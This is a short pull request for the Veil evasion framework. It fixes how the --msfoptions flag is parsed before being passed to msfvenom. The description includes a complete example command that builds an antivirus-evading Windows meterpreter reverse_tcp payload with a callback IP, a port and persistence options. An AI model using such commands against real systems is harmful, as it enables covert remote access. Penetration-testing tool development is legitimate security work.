### PR TITLE
Fix for cli processing of --msfoptions

### DIFF
--- a/tools/evasion/evasion_common/shellcode_help.py
+++ b/tools/evasion/evasion_common/shellcode_help.py
@@ -545,8 +545,7 @@ def cli_msf_shellcode_gen(command_line_args):
     # Parse extra flags to be included in msfvenom command
     extra_options = ""
     if command_line_args.msfoptions is not None:
-        num_extra_options = command_line_args.msfoptions.split(' ')
-        for xtra_opt in num_extra_options:
+        for xtra_opt in command_line_args.msfoptions:
             if xtra_opt != '':
                 if "=" not in xtra_opt:
                     print(helpers.color(" [!] Parameter not entered in correct syntax.\n", warning=True))


### PR DESCRIPTION
There's no example in the readme for passing --msfoptions but the current version attempts to split a list and encapsulating with single or double quotes fails also. This will make the resulting call intuitive.

<pre>
veil -t Evasion -p 17 --msfvenom windows/meterpreter/reverse_tcp --msfoptions SessionExpirationTimeout=0 SessionRetryCount=9999 --ip 192.168.1.1 --port 1337 -o output
</pre>

From the looks of it what was there was just erroneously copied from the menu parsing code.